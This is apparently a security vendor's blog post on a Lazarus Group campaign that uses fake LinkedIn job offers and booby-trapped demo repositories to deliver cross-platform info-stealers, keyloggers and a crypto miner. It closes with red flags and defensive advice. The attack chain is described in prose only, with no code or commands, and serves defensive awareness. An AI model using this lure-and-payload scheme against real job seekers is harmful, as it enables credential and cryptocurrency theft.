From Job Offer to Cyber Threat: Inside the Lazarus Group’s LinkedIn Scam

As sites like LinkedIn begin to become evermore important when it comes to keeping up with your network and making new connections across the globe, it is important to remember that not everyone has your best interest in mind.

With recruiters using LinkedIn as a very popular way to research and reach out to potential candidates, bad actors have begun to try to abuse people’s trust and desire for new challenges to lure them in with fake job opportunities as a way capture their credentials and deliver additional malware.

For this article, we will primarily be discussing one attack chain identified by Bitdefender Labs where one of their own employees was a target of a very sophisticated, active campaign being conducted by the North Korea-linked Lazarus Group.

The Set-Up

The attack begins when an employee was contacted via a LinkedIn message about an opportunity to collaborate on a decentralized cryptocurrency exchange.

The details of the job are often left deliberately vague, the core promises of the job often feature any of the following:

• Remote work
• Part-time flexibility
• Reasonable pay

Some additional variations of this scam also include “projects” and “opportunities” related to travel or financial domains.

Once the target expresses interest, the “hiring process” unfolds and the bad actor springs into action. As with many job opportunities, they first request a resume from the target. This resume can often be used to gain additional insight into the target which can then be used to build an additional level of trust which will later be exploited.

Once the conversation has progressed forward, the bad actor will then share a repository containing the “minimum viable product” (MVP) of the project and asks for the target to “review” and provide feedback on prior to moving forward with the interview process. To ensure that they open the repository, they will also include a feedback form with questions that can only be answered by executing the demo.

Payload Execution

At first glance, the code used for the demo appears to be harmless. However, upon a much closer inspection, a heavily obfuscated script is revealed. This script is then used to deliver the payload by dynamically loading malicious code from a third-party endpoint.

This payload is a cross-platform info-stealer that can be deployed on Windows, MacOS and Linux operating systems which helps ensure that regardless of the target, the payload will be delivered. The specific info-stealer we are discussing today is engineered to focus on cryptocurrency wallets found on the system. It does so by looking for any crypto-related browsing extensions with the following IDs:

Once the payload has been deployed, the info stealer gets to work by collecting important files corresponding to these cryptocurrency wallets. On top of that it also collects the login data of the used browsers and exfiltrates all information to a malicious IP address that seems to contain other malicious files on the server. Once all the desired data has been exfiltrated, the info-stealer then downloads and executes an additional Python script named main99_65.py that sets the stage for other malicious activities.

Next Stage

To remain hidden until it is time to strike, the Python script (main99_65.py) begins to decompress and decode itself recursively until it finally reveals the next stage – a hidden script that further enables the download of three additional Python modules:

mlip.py

• Hooks keyboard events specifically targeting web browsers.
• Monitors clipboard changes system-wide for crypto-related data.
• Immediately sends stolen data to a remote attacker-controlled server.

pay.py

• Reports system/network info to the attacker.
• Searches for and exfiltrates valuable files and uploads these files to the attacker’s C2 server.
• Maintains a persistent communication channel for additional commands and scripts.

bow.py

• Iterates over the following browsers: Chrome, Brave, Opera, Yandex, Microsoft Edge
• The inclusion of Yandex, which is primarily a Russian based browser, indicates that the list of potential targets expands into many other parts of the world.
• Extracts and exfiltrates sensitive browser data (logins and payment info) for Windows, Linux, and macOS

After all of this, yet another payload is dropped and executed. This new payload performs many concerning actions such as adding the binaries to exception list of Microsoft Defender, while also downloading and starting a Tor Proxy Server to communicate with the C2. Once connected to the Tor server, it downloads another malicious executable which contains multiple modules, including a backdoor for data collection, a crypto miner and a keylogger to capture, store and exfiltrate keystrokes.

What to look out for?

As social platforms such as LinkedIn increasingly become hotspots for malicious activities, it is important to stay informed on attack techniques such as this and remain cautious whenever interacting with others online. Attacks like these will only become more and more sophisticated as the techniques improve over time so we need to start educating ourselves on what to look out for and other best practices to help avoid falling victim to one of these scams.

Red Flags

• Vague job descriptions: No corresponding job posting on the platform. If it were a legitimate job posting, there should also be a job listing to reference back to which outlines the role and allows potential applicants to find the listing. A noticeable absence of this may be a potential warning sign that it is not a legitimate position.
• Suspicious code repositories: Keep an eye out for users with random names and an overall lack proper documentation or contributions.
• Poor communication: Very similar to other forms of phishing attacks, it is recommended to look for frequent spelling errors. Additionally, refusal to provide alternative contact methods, such as corporate emails or phone numbers for verification can be a big red flag.
• Too-Good-To-Be-True Job Offers: Be wary of job offers that promise high salaries for minimal work or require you to pay upfront for training or equipment.
• Phishing Links: Scammers may send links that lead to fake websites designed to steal your information. Always hover over links to see where they lead before clicking.
• Fake Profiles: Look out for profiles with generic photos, incomplete information, or inconsistencies in their work history. Scammers often use fake profiles to gain your trust.

Best Practices

• Verify authenticity: If there is ever any doubt, always cross-check job offers with official corporate websites and confirm email domains.
• Adopt a cautious mindset: Scrutinize unsolicited messages and requests for personal information.
• Report Suspicious Accounts: If you believe you may be receiving a message from a potential bad actor, it is highly recommended that you report the account so that LinkedIn can remove the account. You can do so by following these steps:
  1. Go to the Profile: Navigate to the profile you want to report.
  2. Click the More Button: On the member’s profile, click the “More” button (usually represented by three dots).
  3. Select Report/Block: From the dropdown menu, select “Report/Block.”
  4. Choose the Reason: In the pop-up window, select “Report [member’s name]” or “Report entire account.”
  5. Specify the Issue: Choose the reason for your report, such as “This person is impersonating someone” or “This account is not a real person.”
  6. Submit the Report: Click “Submit report” to complete the proces

Additional DefenseStorm Recommendations

Continuous research is being conducted for all newly discovered or recurring malware and ransomware. As always, DefenseStorm recommends the following practices to help secure your environment:

• Continued internal training for phishing campaigns
• Block threat indicators at their respective controls
• Keep all systems and software updated to the latest patched versions to best protect against all known security vulnerabilities
• Maintain a strong password policy
• Enable multi-factor authentication
• Regularly back up data, air gap, and password backup copies offline
• Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, secure location
• Use app hardening
• Restrict administrative access